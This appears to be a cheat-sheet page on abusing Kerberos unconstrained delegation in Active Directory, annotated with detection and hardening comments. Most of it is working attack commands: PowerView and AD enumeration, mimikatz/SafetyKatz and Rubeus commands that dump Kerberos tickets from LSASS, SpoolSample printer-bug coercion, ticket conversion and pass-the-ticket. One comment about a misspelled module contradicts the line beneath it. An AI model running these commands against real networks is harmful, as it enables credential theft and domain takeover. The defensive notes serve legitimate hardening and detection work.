Unconstrained Delegation

# PowerView: list computer accounts trusted for unconstrained delegation.
# A host with this setting keeps the TGT of every user who authenticates to it,
# so each result should be a known server with a documented reason for the flag.
Get-DomainComputer -UnConstrained | select samaccountname # $SamAccountName (referenced further down the page)

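# ActiveDirectory module: the same inventory using Microsoft's own cmdlets.
# (The module name was misspelled, so the import failed before any query ran.)
Import-Module ActiveDirectory
# primarygroupid 515 is Domain Computers, so domain controllers (516), which are
# trusted for delegation by default, are filtered out of the result.
Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description
# User accounts carrying the same flag; review each one.
# Hardening: set "Account is sensitive and cannot be delegated" on privileged
# accounts, or add them to Protected Users, so their TGT is never forwarded.
Get-ADUser -Filter {TrustedForDelegation -eq $True}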

# Export the stored Kerberos tickets with mimikatz.
# Detection: both commands read LSASS memory; alert on unexpected process access
# to lsass.exe (for example Sysmon event ID 10) and on new .kirbi files on disk.
# Hardening: LSA protection (RunAsPPL) and Credential Guard raise the cost of this step.
SafetyKatz.exe '"sekurlsa::tickets /export"' # hash.kirbi (exported ticket file)
Invoke-Mimikatz –Command '"sekurlsa::tickets /export"' # hash.kirbi (exported ticket file)

# Export the stored tickets with Rubeus: poll at a 5-second interval for new
# tickets belonging to the named user and print them without line wrapping.
.\Rubeus.exe monitor /interval:5 /nowrap /targetuser:Administrator # hash.raw (base64 output); convert to hash.kirbi
	
# Forcing the domain administrator's authentication.
# Defender's view: any privileged logon to a delegation-trusted host leaves that
# account's TGT on the host, so admin accounts should not log on to such servers
# and should be marked "sensitive and cannot be delegated".
Enter-PSSession {$SamAccountName}

# Forcing the domain administrator's authentication through the printer bug.
# Mitigation: stop and disable the Print Spooler service on domain controllers
# and on any server that does not need to print.
.\SpoolSample.exe <printmachine> <unconstrinedmachine>

# Convert hash.raw to hash.kirbi: base64-decode the ticket text and write the
# resulting bytes to a file. "hash.raw" and the path are placeholders on this page.
[IO.File]::WriteAllBytes("C:\path\hash.kirbi", [Convert]::FromBase64String("hash.raw"))

# Pass-the-ticket: load the exported .kirbi file into the current logon session.
# Detection: look for a privileged account's Kerberos activity (event IDs 4768/4769)
# coming from a host that account never logged on to interactively.
SafetyKatz.exe '"kerberos::ptt C:\path\hash.kirbi"'

Referencias
